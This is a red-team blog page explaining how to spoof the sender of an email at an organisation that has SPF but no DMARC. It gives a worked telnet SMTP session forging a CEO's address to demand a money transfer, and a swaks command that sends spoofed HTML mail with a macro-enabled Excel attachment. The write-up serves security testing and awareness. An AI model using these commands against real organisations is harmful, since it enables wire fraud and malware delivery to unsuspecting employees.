😎
Intruder
  • About Shantanu Khandelwal
  • Reporting
    • Excel Sheet to Word Report by PowerShell
    • Ghostwriter - Add report type
  • Red Team
    • HTTPS C2 Done Right NGINX
    • Domain Front
      • Firebase Domain Front - Hiding C2 as App traffic
    • GoLang
      • Red Team: How to embed Golang tools in C#
      • Red Team: Using SharpChisel to exfil internal network
      • Converting your GO bins to Shellcode and Using them in C#
    • ShellCode Injection
      • magic_mz_x86 and magic_mz_x64
      • Process Hollowing DInvoke
      • Shellcode Formatter
      • DLL Sideloading
      • InMemory Shellcode Encryption and Decryption using SystemFunction033
    • PowerShell
      • Enable Restricted Admin using powershell and use mimikatz for RDP
      • Powershell Custom Runspace
      • Using Reflection for AMSI Bypass
    • Database
      • Extract MSSQL Link Password
      • MSSQL Link Crawl - OpenQuery Quotes Calculator
    • DLL Sideloading
      • DLL Koppeling
      • DLL Sideloading not by DLLMain
    • Walking with Docker
      • Self-Hosting Havoc C2 / or any other C2 in Docker
    • Breach Attack Simulation - Starting With OpenBAS
  • Dealing with the Errors
    • Setting Up OPENVAS in KALI 2020.3
    • Page
      • Page 1
  • Phishing
    • Connecting GoPhish with Office365
    • SharpLoginPrompt - Success and a Curious Case
    • Gophish MODs
    • Long Live DMARC - Email Spoof issues
    • Error Solves (Random)
      • Rust OPENSSL install issues
  • Mobile Application Testing
    • How to Download APK from Huawei App Store
  • Talks I Like
  • Talks Worth Checking Out
  • Web Application Penetration Testing
    • Parsing Certificate Transparency Logs
Powered by GitBook
On this page

Was this helpful?

  1. Phishing

Long Live DMARC - Email Spoof issues

Spoof emails when SPF is present but DMARC is not allowing you to spoof the sender

PreviousGophish MODsNextError Solves (Random)

Last updated 3 years ago

Was this helpful?

Recently, during my research, I came across an organization that was using O365 for emails. While, during the initial recon, I skipped over the fact that they didn't have a DMARC, it clicked me when I was reading over my notes.

Background Info:

Email Provider : O365

SPF: Exists (v=spf1 ip4:192.168.0.0/24 -all)

DMARC: Do not exist

If you don't like nslookup commands, you can check this on MXtoolbox as well

TIP: If it exists check if p=None is set. p=none means DMARC policy of reject or quarantine isn't enforced

Technical Background

An email consists of two parts an SMTP envelope and Message data. Below is a pictorial representation

SPF verifies HELO/EHLO

DKIM: Verify the DKIM-signature of the sender

DMARC: checks alignment between 'From' and 'Mail From'

In Conclusion, if DMARC isn't present, there is no way to verify the alignment between the 'MAIL FROM' and 'FROM' fields. If the receiving user only sees 'FROM' then an attacker is free to forge anything. Simply put, an attacker can put any email address he likes in the 'FROM' field and the receiving user will see that the email is coming from the forged 'FROM' address.

Current Exploitation Methods:

Quick guides I found on exploiting DMARC not present issue also known as "SPF-BYPASS" are as follows

Info Extract from above methods

Info Extract from the above methods

So to spoof following actions must be performed

Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe)

Step 2: Get a VPS that allows SMTP. I'm using DigitalOcean.

Step 3: Set the right SPF record on the domain. Example v=spf1 mx a ip4:<Digital OCEAN IP> -all

Step 4: connect via telnet to the target SMTP server. My target org used office365 so we'll telnet to orgname-com.mail.protection.outlook.com

telnet orgname-com.mail.protection.outlook.com 25

Step 5: Perform actions as below 

ehlo fook.redteam.cafe
MAIL FROM: attacker@fook.redteam.cafe
RCPT To: victim@orgname.com
data
from: "CEO ORG" <ceo@orgname.com>
to: <victim@orgname.com>
subject: transfer money urgently

Hey send me money at bank account 123456789

.

Enjoy the profit

Missing Automation 🤷‍♂️

So all this is good and everything, but where the hell is automation. As a red teamer, I asked myself these questions

  1. Where is automation? Do I send an email by telnet to all my victims? That's boring

  2. How do I send an HTML email?

  3. How do I send an attachment with my email?

After looking at many telnet automation, I was frustrated. I decided to use SWAKS, the Swiss Army knife for emails.

Instead of doing loads of telnet, manual encoding of messages, lets run this sweet command and be done

./swaks --ehlo fook.redteam.cafe --from attacker@mail.redteam.cafe --to victim@orgname.com --server orgname-com.mail.protection.outlook.com --h-From '"CEO  ORG" <ceo@orgname.com>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html

Is this something new ?

Probaby not, You must have heard about this 100 years ago.

How can I find more issues in the email delivery system?

Super Useful Research

While doing some google-fu, I found two very useful projects to test mail delivery systems.

These projects will help you discover issues in mail delivery systems. You may even get a 0 day in your pocket 🤷‍♂️ if you choose the right target. Shhhhh

References:

Amazing Blackhat Talk

Well, there is of course the manual way to dig for SPF, DMARC and DKIM. You can also just go to for a quicker way in.

MailSploit -

espoofer -

https://github.com/Rices/spf-bypass
https://o365info.com/how-to-simulate-spoof-e-mail-attack-and-bypass-spf-sender-verification-part2-of-2/
caniphish.com
https://github.com/pwnsdx/Mailsploit
https://github.com/chenjj/espoofer
https://www.blackhat.com/us-20/briefings/schedule/#you-have-no-idea-who-sent-that-email--attacks-on-email-sender-authentication-19902
Email Spoof Attack Components
DMARC of the domain doesn't exist
Breakdown of two parts of an email
SPF and DKIM verification fields